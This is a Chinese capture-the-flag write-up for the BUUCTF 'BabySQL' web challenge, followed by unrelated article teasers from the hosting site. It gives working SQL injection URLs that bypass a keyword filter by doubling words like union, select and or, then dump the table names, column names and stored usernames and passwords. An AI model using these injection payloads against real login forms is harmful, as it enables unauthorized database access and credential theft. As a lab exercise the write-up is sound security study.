buuctf web [极客大挑战 2019]BabySQL

buuctf web [极客大挑战 2019]BabySQL

news/2024/7/23 10:48:34 标签: 前端

又是你，还来？好好好

依旧老方法，先试探一手

有错误？

你有一个错误在你的SQL语法;检查与您的MariaDB服务器版本对应的手册，以便在第1行'1=1#'和password='1 "附近使用正确的语法

看来是or被过滤了，试试双写

双写可以绕过，这下就好办了，后面遇到同样被过滤的词，直接双写就🆗了

1、查看字段数

/check.php?username=1'oorrder bbyy 1%23&password=1'
/check.php?username=1'oorrder bbyy 2%23&password=1'
/check.php?username=1'oorrder bbyy 3%23&password=1'
/check.php?username=1'oorrder bbyy 4%23&password=1'

需要双写or和by

字段为1，2，3的时候页面显示为

字段为4报错

2、联合查询1，2，3字段

/check.php?username=1'ununionion seselectlect 1,2,3%23&password=1'

需要双写union和select

可以再页面上返回信息的是2，3字段

3、爆破当前的库、用户

/check.php?username=1'ununionion seselectlect 1,user(),database()%23&password=1'

需要双写union和select

4、爆破表

/check.php?username=1'ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema=database()%23&password=1'

需要双写union、select、from、or、where

5、爆破b4bsql表

/check.php?username=1'ununionion seselectlect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_schema=database() anandd table_name='b4bsql'%23&password=1'

双写union、select、from、or、where、and

6、爆破表里的3个数据

/check.php?username=1'ununionion seselectlect 1,2,group_concat(id,username,passwoorrd) frfromom b4bsql%23&password=1

双写union、select、or、from

flag网页中显示并不完整，打开Shift+F12打开源码就能看到完整的flag

http://www.niftyadmin.cn/n/5049179.html

相关文章

20230925 比赛总结

20230925 比赛总结

反思 A 感觉有点降智，一眼 m a n a c h e r manacher manacher，但很久才想到可以二分，然后就转化成了一个区间最大值问题 B 感觉有点弱智的题，题目不难，一开始算复杂度的时候认为 [ 1.5 − 3 ] ∗ 1 0 8 [1.5-3]…

阅读更多...

DAZ To UMA⭐三.导入Blender的配置, 及Blender快捷键

DAZ To UMA⭐三.导入Blender的配置, 及Blender快捷键

文章目录 🟥 Blender快捷键1️⃣ 3D视图快捷键2️⃣ 视角快捷键3️⃣ 编辑快捷键4️⃣ 对物体的操作🟧 Blender导入FBX的配置🟩 设置脸部骨骼大小1️⃣ 切换视角2️⃣ 缩小脸部骨骼3️⃣ 本节效果预览🟦 设置眼角膜透明度🟥 Blender快捷键 1️⃣ 3D视图快捷键快捷键…

阅读更多...

android 默认开启谷歌定位精准度

android 默认开启谷歌定位精准度

摘要：本文主要提供一种默认开启谷歌定位精准度开关的方案。通过调试时打开/关闭开关对比SettingsProvider的数据变化，在开机收到ACTION_BOOT_COMPLETED广播后，主动修改并填充数据，实现默认打开的需求。在设置中实现方案因为设…

阅读更多...

登录业务实现 - token登录鉴权

登录业务实现 - token登录鉴权

登录业务实现： 登录成功/失败实现 -> pinia管理用户数据及数据持久化 -> 不同登录状态的模板适配 -> 请求拦截器携带token（登录鉴权） -> 退出登录实现 -> token失效（401响应拦截） 1. 登录成…

阅读更多...

C#中的（++)和(--)运算符

C#中的（++)和(--)运算符

目录背景: 的前加效果展示: 的后加效果展示 : 总结: 背景: 自增和自减运算符存在于C/C/C#/Java等高级语言中，它的作用是在运算结束前(前置自增自减运算符 )或后(后置自增自减运算符 )将变量的值加(或减)1。在C#中，和--是自增和自减运…

阅读更多...

前后台分离开发 YAPI平台前端工程化之Vue-cli

前后台分离开发 YAPI平台前端工程化之Vue-cli

目录 YAPI介绍前端工程化之Vue-cli前端工程化简介前端工程化入门——Vue-cli环境准备Vue项目简介创建Vue项目vue项目目录结构介绍vue项目运行方法 Vue项目开发流程前后台混合开发这种开发模式有如下缺点： 沟通成本高：后台人员发现前端有问题&#xff0…

阅读更多...

L1-032 Left-pad C++解法

L1-032 Left-pad C++解法

一、题目再现根据新浪微博上的消息，有一位开发者不满NPM（Node Package Manager）的做法，收回了自己的开源代码，其中包括一个叫left-pad的模块，就是这个模块把javascript里面的React/Babel干瘫痪了。这是个…

阅读更多...

python安全工具开发笔记（五）——python数据库编程

python安全工具开发笔记（五）——python数据库编程

一、Python DB API 在没有Python DB API之前： 有Python DB API之后： Python DB API包含内容 Python DB API访问数据库流程二、Python Mysql开发环境三、Python 数据库编程实例数据库连接对象connection 连接对象：建立Python客户端…

阅读更多...

最新文章